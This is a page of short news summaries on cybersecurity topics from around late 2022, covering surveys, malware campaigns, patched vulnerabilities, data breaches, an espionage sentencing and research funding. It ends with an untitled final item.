News Items

  • news

    Visible to the public "Only 30% of Cyber-Insurance Holders Say Ransomware is Covered"

    According to a news study by researchers at Delinea, cyber insurance providers appear to be limiting policy coverage due to surging costs from claimants. The researchers polled 300 US-based IT decision-makers for the study. The researchers noted that although 93% of the organizations were approved for specialized cyber-insurance cover by their provider, just 30% said their policy covered "critical risks," including ransomware, ransom negotiations, and payments. Around half (48%) of the participants said their policy covers data recovery, while just a third indicated it covers incident response, regulatory fines, and third-party damages. The researchers stated that this may be because many organizations are regularly being breached and look to their providers for payouts, driving up costs for carriers. The researchers noted that some 80% of those surveyed said they've had to call on their insurance, and half of the organizations have submitted claims multiple times. As a result, many insurers are demanding that prospective policyholders implement more comprehensive security controls before they're allowed to sign up. The researchers noted that half (51%) of respondents said that security awareness training was a requirement, while (47%) said the same about malware protection, AV software, multi-factor authentication (MFA), and data backups. However, the researchers noted that high-level checks might not be enough to protect insurers from surging losses, as they can't guarantee customers are properly deploying security controls.

    Infosecurity reports: "Only 30% of Cyber-Insurance Holders Say Ransomware is Covered"

  • news

    Visible to the public  "API Abuses and Attacks Create New Challenges for Retailers"

    Imperva Threat Research has released the "The State of Security Within eCommerce 2022" report, a 12-month analysis of cybersecurity threats targeting the retail industry. Account takeover, credit card fraud, web scraping, Application Programming Interface (API) abuses, Grinch bots, and Distributed Denial-of-Service (DDoS) attacks were ongoing challenges for the eCommerce industry, threatening online sales and customer satisfaction. Attacks on retailers' websites, apps, and APIs throughout the calendar year, particularly during the peak holiday shopping season, is a continuing business risk for the retail industry. According to Lynn Marks, Senior Product Manager at Imperva, the holiday shopping season is a critical period for the retail industry, and cybersecurity threats could undermine retailers' bottom lines. This industry is subject to a wide range of security threats, most of which are automated and continuous. In order to stop these persistent attacks, retailers need a unified approach that focuses on data protection and is equipped to mitigate attacks quickly without disruption for customers. Nearly 40 percent of traffic to retailers' websites in the last year did not come from humans. Instead, it was caused by a malicious bot. The Grinch bot is notorious in the retail industry for inventory hoarding during the holiday shopping season, scooping up high-demand items, and making it difficult for consumers to purchase gifts online. This article continues to discuss key findings from Imperva's "The State of Security Within eCommerce 2022" report.

    Help Net Security reports "API Abuses and Attacks Create New Challenges for Retailers"

  • news

    Visible to the public "Evasive KmsdBot Cryptominer/DDoS Bot Targets Gaming, Enterprises"

    Researchers have discovered an evasive malware that uses a key Internet-facing protocol to gain access to enterprise systems in order to mine cryptocurrency, launch Distributed Denial-of-Service (DDoS) attacks, and gain a foothold on corporate networks. The botnet, dubbed KmsdBot by Akamai Security Research, infects systems via a Secure Shell Protocol (SSH) connection with weak login credentials. SSH is a remote administration protocol that enables users to connect to, control, and modify remote servers via the Internet. According to Larry Cashdollar, principal security intelligence response engineer at Akamai, the botnet poses the greatest risk to enterprises that have deployed cloud infrastructure or corporate networks that are exposed to the Internet. KmsdBot, which is written in Golang, was observed by the researchers as an evasive measure, targeting an "erratic" range of victims, including gaming and technology companies, as well as luxury car manufacturers. Golang is a programming language that is appealing to threat actors because it is difficult to reverse engineer. Furthermore, once infected, the botnet does not maintain persistence, allowing it to avoid detection even further. KmsdBot was discovered by the researchers when it presented an unusually open honeypot in the hopes of luring attackers. The first victim of the new malware they discovered was an Akamai client, FiveM, a gaming company that provides custom private servers for Grand Theft Auto online. Threat actors launched the attack by opening a User Datagram Protocol (UDP) socket and constructing a packet with a FiveM session token. This article continues to discuss researchers' findings and observations surrounding KmsdBot.

    Dark Reading reports "Evasive KmsdBot Cryptominer/DDoS Bot Targets Gaming, Enterprises"

  • news

    Visible to the public "These Two Google Play Store Apps Spotted Distributing Xenomorph Banking Trojan"

    Google has removed two new malicious dropper apps discovered on the Google Play Store, one of which masqueraded as a lifestyle app and was caught distributing the Xenomorph banking malware. According to Zscaler ThreatLabz researchers, Xenomorph is a Trojan that steals credentials from banking applications on users' devices. It can also intercept SMS messages and notifications, allowing it to steal one-time passwords and multi-factor authentication (MFA) requests. The cybersecurity firm also discovered an expense tracker app that displayed similar behavior, but it was unable to extract the URL used to retrieve the malware artifact. Both apps serve as droppers, which means they are harmless and serve as a conduit to retrieve the actual payload, which in the case of one app, is hosted on GitHub. Xenomorph, first identified by ThreatFabric in February, is known to exploit Android's accessibility permissions to perform overlay attacks, in which fake login screens are displayed on top of legitimate bank apps in order to steal the victim's credentials. Furthermore, the malware uses the description of a Telegram channel to decode and construct the command-and-control (C2) domain used to receive additional commands. This article continues to discuss the distribution of the Xenomorph banking Trojan via two new malicious dropper apps on the Google Play Store.

    THN reports "These Two Google Play Store Apps Spotted Distributing Xenomorph Banking Trojan"

  • news

    Visible to the public "Phishing Infects Thousands of Personal And Business Computers With IceXLoader Malware"

    Due to an ongoing phishing operation, a new malware variant called "IceXLoader" has infected thousands of residential and business users. The creators of IceXLoader, a malware loader discovered in the wild last summer, have released version 3.3.3 of the tool, which includes a multi-stage distribution chain and improved functionality. IceXLoader was at version 3.0 when Fortinet discovered the Nim-based malware in June 2022, but it lacked certain essential functionality and appeared to be in development. The most recent IceXLoader release marks a departure from the project's beta development phase. IceXLoader 3.3.3 copies itself into two folders labeled with the operator's nicknames and then gathers and exfiltrates host data to the command-and-control (C2) server, including the IP address, username, machine name, Windows OS version, hardware information, presence of Framework v2.0 and/or v4.0, and more. The loader supports stopping execution, restarting IceXLoader, changing C2 server beaconing interval, loading and executing a .NET assembly, and other commands. This article continues to discuss the impact and capabilities of the IceXLoader 3.3.3.

    CyberIntelMag reports "Phishing Infects Thousands of Personal And Business Computers With IceXLoader Malware"

  • news

    Visible to the public "LSU Cybersecurity Researchers Help Protect People in Immersive Virtual Reality"

    In 2020, about two million people used Virtual Reality (VR) headsets. The VR industry is expected to grow from $12 billion to $100 billion over the next five years. However, VR software developers and companies are not always implementing measures to protect consumers from being hacked. VR products are often released while still in development. Abe Baggili, an Louisiana State University (LSU) Cybersecurity Professor, is among the first in the world to investigate the security of immersive VR, or X-Reality (XR), systems and to provide solutions to this industry in order to protect people who use these new products. Everyone should be aware that all technology contains security risks. Once someone has access to an individual's device, they could steal their money by gaining access to their banking and credit card accounts, as well as cause other havoc in their life, according to Baggili. Baggili and his cybersecurity students tested a popular social and entertainment XR application, mostly used to watch movies with others in a virtual environment, to see if they can hack into users' headsets and computers. The team discovered that they could, and were able to, take control of a user's VR headset, view their screen, activate their microphone, and install a virus on their computer without the user's knowledge. When another user entered the virtual room and interacted with the unknowingly infected user, they became infected as well, similar to how viruses spread in real life. Furthermore, the researchers were able to enter the virtual room using an unnoticed device and act as a virtual invisible peeping Tom. Many of these VR applications and headsets are being used by children and young people, making safety and security measures even more important. The structure of the physical room a person is in, as well as their eye, hand, and body movements, are all collected by VR and XR devices. According to Baggili, this information could be used to cause physical, emotional, and financial harm to a user and their family. The researchers were able to disorient users, delete physical boundaries, and make them walk into walls or fall down staircases in reality by hacking into a VR headset and camera. This article continues to discuss the LSU cybersecurity researchers' study on protecting people in immersive VR.

    LSU reports "LSU Cybersecurity Researchers Help Protect People in Immersive Virtual Reality"

  • news

    Visible to the public "Study Confirms That Trust Following a Security Breach Is Best Retained When Organizations Are Up Front"

    According to new research from Durham University Business School, organizations that suffer security breaches in which customer information is compromised are far more likely to retain consumer trust if they are quick to communicate the incident and are proactive in developing a solution. The study aimed to gain more insight into the actions typically taken by organizations in the event of a security breach, as well as the following consumer reactions. The researchers hoped that by doing so, they would be able to guide organizations in selecting response strategies that would allow them to maintain consumers' trust and their market standing. They conducted experiments and developed a conceptual model reflecting the most common types of security breaches within eCommerce, as well as the typical response strategies of affected organizations, to capture accurate consumer appraisals on how previous security breach incidents were handled. Their investigation revealed that the key factors for retaining consumer trust after a security breach are the perceived risk, the severity of the breach, and the affected organization's response efficacy. Findings showed that consumers' reactions varied depending on the type of data that was put at risk. For example, financial and privacy risks were discovered to be the most significant factors in determining consumers' intentions to return to a breached organization. The affected organizations' chosen response strategy proved to be the most important factor in retaining consumer trust. While it could be assumed that announcing a security breach would alarm consumers, the researchers discovered that by taking a more proactive approach, organizations could reduce consumer concerns while also positively boosting their reputation. This article continues to discuss the "Security Breaches and Organization Response Strategy: Exploring Consumers' Threat and Coping Appraisals" study.

    Continuity Central reports "Study Confirms That Trust Following a Security Breach Is Best Retained When Organizations Are Up Front"

  • news

    Visible to the public "GenCyber Camp Will Help Local Teachers Integrate Cybersecurity Into Lesson Plans"

    A new Binghamton University-led initiative aims to provide teachers with the resources they need to help their students navigate today's cybersecurity threats. In summer 2023, the GenCyber program will provide a free eight-day cybersecurity camp for 25 middle and high school teachers, as well as pre- and post-camp outreach activities in K-12 schools. A $136,000 National Security Agency (NSF) grant to faculty members at the Thomas J. Watson College of Engineering and Applied Science's Department of Computer Science and the College of Community and Public Affairs' (CCPA) Department of Teaching, Learning, and Educational Leadership is funding the camp. The proposal's goal was to raise cybersecurity awareness in schools and communities, as well as to improve teachers' readiness to develop cybersecurity content. Another objective is to pique students' interest in cybersecurity careers. Computer and network fundamentals, cybersecurity ethics, cyberbullying, email/web/social network security, and cybersecurity careers will all be covered at the camp. Teachers who participate will receive $900, a Chromebook, lesson slides, and a T-shirt. The GenCyber camp is intended to assist teachers in navigating the New York State Board of Regents' new digital fluency learning standards, which must be implemented in schools by the fall of 2024. Part of this project involves helping teachers understand what the new standards mean and how they can be implemented in their specific subject area. The long-term goal is to create a local K-12 cybersecurity ecosystem through collaborations with schools, science centers, high-tech companies, and Binghamton University student organizations. This article continues to discuss the goals and structure of the GenCyber camp.

    Binghamton University reports "GenCyber Camp Will Help Local Teachers Integrate Cybersecurity Into Lesson Plans"

  • news

    Visible to the public "Insider Threat Peaks to Highest Level in Q3 2022"

    According to Kroll's "Q3 Threat Landscape: Insider Threat the Trojan Horse of 2022" report, insider threats peaked at its highest level yet in the third quarter of 2022, making up nearly 35 percent of all unauthorized access threat incidents. In the first quarter, 31 percent of all unauthorized access cases were related to insider threats, and in the second quarter, 24 percent of cases were related to insider threats. This quarter, Kroll also observed several malware infections via USB, potentially indicating broader external factors that may encourage insider threat, such as an increasingly fluid labor market and economic turbulence. The "great resignation," defined as an increase in the number of employees seeking new opportunities in the aftermath of the COVID-19 pandemic and the shift to remote work, has also coincided with an increase in the risk of insider threats, which is already exceptionally high during the employee termination process. Disgruntled employees, according to Kroll, may attempt to steal data or company secrets in order to publicly undermine an organization. Others may try to transfer data that they can use at their new organizations, such as contact lists and proprietary documents. In one instance observed by Kroll in the third quarter, an employee attempted to steal gigabytes of data by copying it to cloud storage networks. In this case, the company followed standard procedure by disabling the users' accounts and deleting data from cloud storage accounts that were accessible to them. Months after the employee left for a competitor, the company became suspicious that the individual was using company data at their new job to boost sales efforts. This article continues to discuss key findings from Kroll's new report on insider threats.

    Security Magazine reports "Insider Threat Peaks to Highest Level in Q3 2022"

  • news

    Visible to the public "Majority of Security Managers Lack Threat Intelligence Skills"

    Security researchers at Vulcan Cyber have found that 73% percent of IT security managers have said they lack necessary threat intelligence (TI) skills, and 55% believe their threat intelligence data is not predictive enough. The researchers stated that the figures above are particularly striking when considering that threat intelligence is a crucial piece of risk management programs today, with 75% of companies having dedicated TI teams and 66% having dedicated threat intelligence budgets. The researchers noted that the primary use cases for threat intelligence include blocking bad IPs/URLs (64%) and integration with other security products for a comprehensive view of cyber-hygiene (63%). The researcher stated that, at the same time, the data suggests threat intelligence is a crucial source for ongoing vulnerability detection and prioritization. In fact, 87% of decision-makers rely on threat intelligence "often or very often" for vulnerability prioritization, and more than 90% of organizations rate their ability to respond based on threat intelligence as average or better. The researchers stated that teams don't just need tools and people. They need skills and the ability to use the tools at their disposal to improve the security posture of their organizations.

    Infosecurity reports: "Majority of Security Managers Lack Threat Intelligence Skills"

  • news

    Visible to the public "Lenovo Patches ThinkPad, Yoga, IdeaPad UEFI Secure Boot Vulnerability"

    Lenovo has issued patches to address two vulnerabilities that could have allowed cybercriminals to run malicious code by deactivating Unified Extensible Firmware Interface (UEFI) Secure Boot. According to researchers at ESET, the high-severity vulnerabilities tracked as CVE-2022-3430 and CVE-2022-3431, could allow threat actors to bypass the basic security functions of a victim's operating system if exploited. The vulnerabilities impact 25 devices across the ThinkBook, Yoga, and IdeaPad lines, though not all of them are affected by both vulnerabilities. Because these devices are widely used in business settings, employees may be affected by the flaw, and sensitive data may be compromised. The flaw, which exists within a driver in the affected devices, lets attackers change a variable in Non-Volatile Random Access Memory (NVRAM) to alter a device's secure boot setting. This was not due to an error in the affected drivers' code but rather to the affected devices being equipped with drivers intended for use only during manufacturing, with relaxed control over secure boot settings from within the operating system. UEFI flaws are serious because they allow threat actors to change critical device processes and potentially install malware in the victim's flash memory. Threat actors could exploit such a flaw to install a rootkit, carrying out malicious activity while remaining undetected and even surviving operating system reinstallation. According to John Goodacre, director of the UKRI's Digital Security by Design challenge and professor of computer architectures at the University of Manchester, secure boot is built on a hierarchy of trust typically rooted in technologies fixed in a device's hardware. Such systems are used to ensure that, even if a vulnerability is exploited during normal system operation, the system can be recovered by rebooting. As a result, it is critical that a system's secure boot cannot be changed while it is in normal operation. However, all software should be considered vulnerable, so it is critical that no mechanisms can evade secure boot during normal operation. This article continues to discuss Lenovo patching high-severity vulnerabilities affecting 25 laptop models.

    ITPro reports "Lenovo Patches ThinkPad, Yoga, IdeaPad UEFI Secure Boot Vulnerability"

  • news

    Visible to the public "Winners Announced in First Phase of UK-US Privacy-Enhancing Technologies Prize Challenges"

    The winners of the first phase of the US-UK Privacy-Enhancing Technologies (PETs) prize challenges have been announced by the UK and US governments. Innovators are taking part in two challenge tracks: using PETs to improve the detection of financial crime and forecasting an individual's risk of infection during a pandemic, or designing a solution that meets both scenarios. The 12 prize-winning technical papers, chosen from 76 submissions, presented cutting-edge approaches to privacy-preserving federated learning, earning a total of $157,000 in prizes. They reflect the breadth and depth of technical talent in both countries, with teams from academic institutions, global technology companies, and privacy start-ups among them. The second phase of the challenges, which started earlier in November, will see participating teams construct the solutions envisioned in their technical papers. They will also have opportunities to interact with regulators and government agencies in order to help shape the development of solutions that adhere to key regulatory principles. In the second phase, innovators will compete for prizes totaling $915,000. The UK and US governments are also accepting applications for red teams to participate in the third phase of the challenges. To assess the final winners, red teams will rigorously test the privacy-preserving capabilities of the top-scoring solutions from the second phase of the challenges. Red team recruitment is now open, with applications due on November 23. Top-scoring red teams will receive prizes from a pool of $225,000. The participants' challenge problems are based on artificially generated or synthetic data sets that are representative of real-world use cases but contain no actual client information. This article continues to discuss the winners of the first phase of the US-UK PETS prize challenges.

    GOV.UK reports "Winners Announced in First Phase of UK-US Privacy-Enhancing Technologies Prize Challenges"

  • news

    Visible to the public "Email Is the Top Vector for Cyberattacks"

    According to a report from Tessian, 40 percent of business emails contain unwanted content. In addition, email is currently the most common method of delivering cyberattacks. Ninety-four percent of organizations experienced a spear phishing or impersonation attack this year, and 92 percent experienced ransomware attacks via email. In the first nine months of 2022, the most common type of advanced email attack was impersonation, in which attackers attempt to create legitimate-looking email addresses. This type of attack is also the most concerning email threat to security leaders. In 2022, security leaders reported an average of 148 impersonation attacks, 141 spear phishing attacks, and 138 email-based ransomware attacks. Ransomware remains a top threat, with 92 percent of global organizations experiencing at least one email-based ransomware attack in 2022 and 10 percent of security leaders surveyed reporting receiving over 450 email-based ransomware attacks since January 2022. Most organizations use a Secure Email Gateway (SEG) or native security from a cloud provider to keep employees secure on email. However, according to the report, 62 percent of security leaders believe advanced email threats bypassed SEGs in 2022. In addition, 99.5 percent of respondents believe Artificial Intelligence (AI) and Machine Learning (ML) can enhance and improve email security, with security leaders citing faster threat detection (66 percent) and more accurate threat detection (56 percent) as the top two AI benefits. This article continues to discuss key findings from Tessian's email security report.

    BetaNews reports "Email Is the Top Vector for Cyberattacks"

  • news

    Visible to the public "Production Systems Cybersecurity Project Receives Significant Funding"

    Business Finland has funded a consortium project investigating cybersecurity in system integration led by Tapio Frantti, Professor of Practice at the University of Jyvaskyla Faculty of Information Technology. Production systems in Finland are controlled using techniques that are not always designed to be cyber-secure. The Cybersecurity Governance of Operational Technology (CSG) project aims to research and develop a reference model for cybersecurity system integration, which can be used to improve the cybersecurity of new power plants and their connection to the power grid. Energy production is increasing and becoming more dispersed, emphasizing the importance of cybersecurity, particularly in system integration. According to Tapio Frantti, the Professor of Practice in charge of the project., if there are safety deficiencies in the energy production system connected to the distribution network, they can be reflected in the entire national energy production and distribution system. By securing the operational functioning and integration of production and information systems, the project enables cyber-secure energy production and improves supply security. This article continues to discuss the goal and support behind the production systems cybersecurity project.

    JYU reports "Production Systems Cybersecurity Project Receives Significant Funding"

  • news

    Visible to the public "Could a Digital Red Cross Protect Hospitals From Ransomware?"

    Across a century of wars, the internationally recognized Red Cross symbol has marked people and facilities off-limits to attack. However, security experts are skeptical of a recent proposal to create a digital Red Cross marker to protect healthcare and humanitarian organizations from cyberattacks, with the reason being that cybercriminals cannot be trusted. The Red Cross recommendation comes as ransomware attacks on medical facilities rise and the role of cyberwarfare in the aftermath of Russia's invasion of Ukraine increases. The proposal calls for making the symbol easy for cyberattackers to find while avoiding detection by cybersecurity teams, as well as making it simple for healthcare and aid agencies to deploy. The issue is that the project would need threat actors who target healthcare to cooperate. Although nation-states recognize the Red Cross symbol on the battlefield, that relationship is nonexistent between victims and criminals, according to Michael Hamilton, CISO at Critical Insight. Their intention is to draw parallels to the battlefield symbol, but Hamilton believes this will be ineffective as a deterrent. Hospitals are specifically targeted due to their importance and, as a result, willingness to pay extortion demands. According to the Red Cross, a digital emblem should be used to identify a wide range of digital components, including servers, computers, smartphones, Internet of Things (IoT) devices, network devices, cloud infrastructure, communication equipment, and more. Errol Weiss, CSO of Healthcare-ISAC, says most attackers use a shotgun approach with emails that can reach millions of people, and once a person falls victim to a phishing attack, their priority is gaining a stronger foothold and looking for ways to monetize the breach. Perhaps they will unwind the attack once they realize what they have access to, but Weiss believes that is unlikely, noting that cybercriminals publicly declared a truce against healthcare during the height of the COVID-19 pandemic, which did not last long. They were attacking hospitals and ransoming hospitals, so they are unlikely to live up to this. This article continues to discuss the proposed digital Red Cross marker to protect healthcare and humanitarian groups from cyberattacks and why there is skepticism surrounding this idea.

    InfoRiskToday reports "Could a Digital Red Cross Protect Hospitals From Ransomware?"

  • news

    Visible to the public "Ransomware-as-a-Service Transforms Gangs Into Businesses"

    According to a recent threat report, Malware-as-a-Service (MaaS) is becoming more accessible to threat actors. The cyber threat group, called 'Eternity Project,' operates through a Tor website and a Telegram channel, selling malware in a systematic manner. The group offers stealer, clipper, worm, miner, ransomware, and Distributed Denial-of-Service (DDoS) bot services. Many security professionals are concerned about this since inexperienced cybercriminals can even use Eternity to target victims with a customized threat offering. Eternity Project charges between $90 and $490 for malware. As MaaS becomes more sophisticated, it is easier than ever to obtain attack tools at a low cost. Cyble researchers found that Eternity Project provides a wide range of malware services through its Telegram channel, which has about 500 subscribers. The channel includes videos and provides detailed information about the service's features. Eternity Project's Telegram channel, like any other brand showcasing new features, shares news about malware updates. Eternity Stealer is one example of the type of harm that Eternity Project's malware can cause. This malware allows users to steal targets' passwords, cookies, credit cards, and cryptocurrency wallets, and then receive the stolen data directly on the Telegram bot. It also provides methods for breaking into messenger apps, password managers, and other software. Customers can build Eternity Stealer malware directly on the Telegram bot. When the user selects a stealer product, options to add features such as AntiVM and AntiRepeat appear. The user can then select an available payload file extension. From there, users can download the exfiltrated payload directly from the Telegram channel. This article continues to discuss the Eternity Project MaaS group, its Eternity Stealer malware, the growth in MaaS activity, and suggestions for thwarting malware attacks.

    Security Intelligence reports "Ransomware-as-a-Service Transforms Gangs Into Businesses"

  • news

    Visible to the public "Apple Patches Remote Code Execution Flaws in iOS, macOS"

    Apple recently released out-of-band patches for iOS and macOS to address two arbitrary code execution vulnerabilities in the libxml2 library. Written in the C programming language and originally developed for the Gnome project, libxml2 is a software library for parsing XML documents. Apple stated the two vulnerabilities, tracked as CVE-2022-40303 and CVE-2022-40304, could lead to remote code execution. Apple has credited Google Project Zero security researchers for discovering both issues. Apple noted that a remote user may be able to cause unexpected app termination or arbitrary code execution for both security flaws. According to Apple, the first of the flaws exists because the lack of specific limitations could lead to integer overflows. Apple noted that improved input validation resolved the issue. In the case of the second vulnerability, in specific conditions, memory errors such as double-free bugs could emerge. Apple says that improved checks fixed the defect. Apple addressed the flaws with the release of macOS Ventura 13.0.1 and iOS 16.1.1, and iPadOS 16.1.1 (for iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th gen and later, and iPad mini 5th gen and later). Apple did not mention if the vulnerabilities were actively being exploited in attacks. However, proof-of-concept (PoC) code targeting CVE-2022-40303, as well as full technical details on CVE-2022-40304 have been published online, which explains why Apple rushed the fixes.

    SecurityWeek reports: "Apple Patches Remote Code Execution Flaws in iOS, macOS"

  • news

    Visible to the public "Couple Get 40 Years for Navy Espionage Plot"

    A Maryland couple recently was sentenced to a combined 494 months behind bars after attempting to sell designs for the US navy's nuclear-powered warships to a foreign power. Jonathan Toebbe, 44, of Annapolis, was sentenced to over 19 years in prison, while his wife Diane Toebbe got over 21 years after pleading guilty to the conspiracy in February. The Department of Justice (DoJ) stated that Jonathan Toebbe was a nuclear engineer for the Department of the Navy at the time of his arrest, working on nuclear propulsion systems. His "restricted data" security clearance gave him access to sensitive information related to military design elements, operating parameters, and performance characteristics of the reactors for nuclear-powered warships. The DoJ noted that after sending a "package" to an unnamed foreign government containing a sample of this information and instructions on how to purchase additional intelligence, Toebbe is said to have used encrypted email to correspond with an individual he believed was a representative of this government. In fact, it was an undercover FBI agent. According to the DoJ, after receiving $10,000 in cryptocurrency as a "good faith" payment from the agent, Toebbe delivered an SD card containing sensitive information, bizarrely hidden inside a peanut butter sandwich. The card included classified info on submarine nuclear reactors. After doing the same thing two more times, Toebbe and his wife were finally arrested in October 2021.

    Infosecurity reports: "Couple Get 40 Years for Navy Espionage Plot"

  • news

    Visible to the public "Medibank Confirms Data Stolen in Breach is Now Available Online"

    Medibank has recently confirmed that the criminal behind a data breach that impacted roughly four million Australians has released files on a dark web forum. According to Medibank, the leaked data includes personal data like names, addresses, dates of birth, phone numbers, email addresses, and Medicare numbers for ahm customers. Also included were passport numbers for international students and some health claim data. Julia O'Toole, CEO of MyCena Security Solutions, stated that the publishing of the data on the dark web was expected after Medibank refused to pay the attacker's ransom demand earlier this week. O'Toole noted that the information that was posted by the ransomware group is not only devastating, but victims must also be on the lookout for phishing scams coming not just through email but also via the phone and mail. O'Toole noted that the risk of identity theft has also just skyrocketed for each of the victims. O'Toole said that other countries should be warned that this cyberattack could become a template for other criminals to follow.

    Infosecurity reports: "Medibank Confirms Data Stolen in Breach is Now Available Online"

  • news

    Visible to the public  "Vulnerability in Flow Computers Used by Major Oil & Gas Companies Around the World Can Allow Attackers to Remotely Control Oil or Gas Quantities and Modify Gas Bills"

    The use of flow computers, which are specialized computers that calculate oil and gas volume and flow rates, is a critical component of the production and distribution of electric power. These devices monitor liquids or gases critical for process reliability and safety, and serve as inputs for other processes (i.e., alarms, records, and settings), so precision is essential. Billing is an important aspect of flow computers' function in a utility. ABB flow computers are critical due to their widespread use in large oil and gas utilities. However, they have flaws that can allow an attacker to interfere with measurements by remotely executing code on the target device. Because flow measurement calculations, specifically those involving gas flow, need a substantial amount of computing power, they are often handled by a low-power Central Processing Unit (CPU) rather than a microcontroller. Flow meters read raw data from connected sensors, which can measure the volume of material in various ways depending on what is being measured. Flow meters such as electromagnetic, vortex, differential pressure, thermal, coriolis, and others are examples. An investigation focused on ABB's FLO G5 flow computers. The FLO G5 is a single-board computer with a CPU, Ethernet, USB, and various IO interfaces. The CPU is an ARMv8 processor with a 32-bit architecture, and the device's operating system is Linux. The important thing to note is that the setup is done using a proprietary protocol developed by ABB called TotalFlow. Using this protocol on top of a serial or Ethernet (TCP) connection is possible. The TotalFlow protocol (TCP/9999) is used for most client-device communication, such as retrieving gas flow calculations, establishing and obtaining device settings, and importing and exporting configuration files. The flaw, tracked as CVE-2022-0902, has a CVSS vulnerability-severity score of 8.1 out of 10 and was recently fixed in an ABB firmware upgrade. This article continues to discuss the potential impact of the vulnerability in flow computers used by major oil and gas companies.

    Exploit One reports "Vulnerability in Flow Computers Used by Major Oil & Gas Companies Around the World Can Allow Attackers to Remotely Control Oil or Gas Quantities and Modify Gas Bills"

  • news

    Visible to the public "Cisco: InterPlanetary File System Seeing 'Widespread' Abuse by Hackers"

    Cisco security researchers have reported the widespread abuse of new Web3 technology by threat actors. The InterPlanetary File System (IPFS) is a data storage and sharing protocol and peer-to-peer network. It is intended to allow for the decentralized storage of resources on the Internet. It was designed to be resistant to content censorship, which means that once content is stored within the IPFS network, it cannot be effectively removed. However, Cisco Talos researchers reported widespread abuse and multiple ongoing campaigns that use the IPFS network to host malware payloads and phishing kit infrastructure while facilitating other attacks. IPFS is typically used for legitimate purposes, making it more difficult for security teams to distinguish between benign and malicious IPFS activity in their networks, according to the researchers. Currently, multiple malware families are hosted within IPFS and are retrieved during the early stages of malware attacks. The IPFS team did not respond to requests for comment. According to Cisco Talos, IPFS is being used to host phishing kits, which are websites used by phishing campaigns to collect and harvest credentials from unsuspecting victims. Hackers are also employing the technology in malware distribution campaigns because it provides low-cost storage for malicious payloads and resilience against content moderation, effectively serving as "bulletproof hosting" for adversaries. Researchers have discovered several samples in the wild that are currently utilizing IPFS. Throughout 2022, they observed an increase in the number of samples in the wild as this became a more popular hosting method for adversaries. In one campaign, victims received emails purporting to be from a Turkish financial institution but were actually part of the Agent Tesla Remote Access Trojan (RAT) infection process. This article continues to discuss the abuse of IPFS by hackers.

    The Record reports "Cisco: InterPlanetary File System Seeing 'Widespread' Abuse by Hackers"

  • news

    Visible to the public "Malware Redirects 15,000 Sites in Malicious SEO Campaign"

    Security researchers at Sucuri have recently spotted an intriguing malware campaign designed to increase the search engine rankings of spam websites under the control of threat actors. Over 15,000 WordPress and other sites have been redirected to the spam Q&A sites. The researchers noted that the hackers are using modified WordPress PHP files and, in some cases, their own PHP files to achieve the redirects, with targeted sites on average containing 100 infected files each. The destination spam sites, of which the researchers have so far found 14, have their servers hidden behind a CloudFlare proxy. The researchers noted that the sites seem to be using the same Q&A pattern and are built using the Question2Answer (Q2A) open source Q&A platform. According to their website, this platform is currently powering over 24,500 sites in 40 languages. The researchers stated that the attackers' spam sites are populated with various random questions and answers found to be scraped from other Q&A sites. Many of them have cryptocurrency and financial themes. The researchers noted that although no malicious activity has been detected on these spam sites yet, the actors behind this campaign could "arbitrarily add malware" to them or redirect visitors again to malicious third-party sites. The researchers stated that it is possible that these bad actors are simply trying to convince Google that real people from different IPs using different browsers are clicking on their search results. This technique artificially sends Google signals that those pages are performing well in search. The researchers noted that this theory is backed by the fact that the second level domains of the Q&A sites "seem to belong" to the same individuals. According to the researchers, the campaign is somewhat unusual in that only 13% of all SEO spam infections are classified as a malicious redirect.

    Infosecurity reports: "Malware Redirects 15,000 Sites in Malicious SEO Campaign"

  • news

    Visible to the public "Malicious 'Cloud9' Chrome Extension Operates Like a Remote Access Trojan"

    Researchers have discovered the "Cloud9" malicious Chrome browser extension, which steals information available during a browser session and then installs malware to take control of the entire device. Cloud9 behaves like a Remote Access Trojan (RAT) and performs at least ten different types of malicious activities, including cookie stealing, keylogging, Layer 4/Layer 7 hybrid attacks, and OS and browser detection for next-stage payloads, according to the Zimperium zLabs team. The malware was also said to have originated from the Keksec malware group, which was founded in 2016 by botnet actors. This organization is best known for its Distributed Denial-of-Service (DDoS) attacks, mining-based malware, and botnets. The ability of this malware to avoid existing endpoint detection systems is particularly concerning, according to Bud Broomhead, CEO of Viakoo. As Broomhead points out, this is similar to how threat actors have targeted Internet of Things (IoT) devices and Operational Technology (OT) systems, which are not supported by traditional Information Technology (IT) security solutions. Many browsers are used as interfaces to OT equipment, especially to access management and control consoles. This could be a way for IoT/OT devices to be exploited by malicious actors. According to John Bambenek, Netenrich's principal threat hunter, this malware primarily exploits older browser vulnerabilities, so security teams should keep browsers patched and updated. However, any functionality or extension added to the browser, as well as configuration changes, can have serious security implications. The browser configuration should be tightly controlled and only allow the installation of specific browser extensions. This article continues to discuss the Cloud9 malicious Chrome browser extension observed stealing session information and then installing malware to take control of the device.

    SC Magazine reports "Malicious 'Cloud9' Chrome Extension Operates Like a Remote Access Trojan"

  • news

    Visible to the public "Some 98% of Global Firms Suffer Supply Chain Breach in 2021"

    According to new research by BlueVoyant, just 2% of global organizations didn't suffer a supply chain breach last year. The researchers noted that visibility into cyber risk is getting harder as these ecosystems expand. The researchers polled 2100 C-level execs with responsibility for supply chain and cyber risk management from companies with 1000+ employees to compile its study. The researchers found that the top challenges that respondents face include: awareness internally that third-party suppliers are part of their cybersecurity posture, meeting regulatory requirements and ensuring third-party cybersecurity compliance, and working with third-party suppliers to improve their posture. The researchers noted that supply chains are growing and that the number of firms with over 1000 suppliers increased from 38% in 2021's study to 50%. The researchers stated that although 53% of organizations audited or reported on supplier security more than twice annually, 40% still rely on suppliers to ensure security levels are sufficient. The researchers noted that this means they have no way of knowing if an issue arises with a supplier. Worse, 42% admitted that if they do discover an issue in their supply chain and inform their supplier, they cannot verify that the issue was resolved. The researchers stated that just 3% of the respondents monitor their supply chain daily, although the number of respondents using security ratings services to enhance visibility and reduce cyber risk increased from 36% last year to 39% in this year's study.

    Infosecurity reports: "Some 98% of Global Firms Suffer Supply Chain Breach in 2021"

  • news

    Visible to the public "Security 'Sampling' Puts US Federal Agencies at Risk"

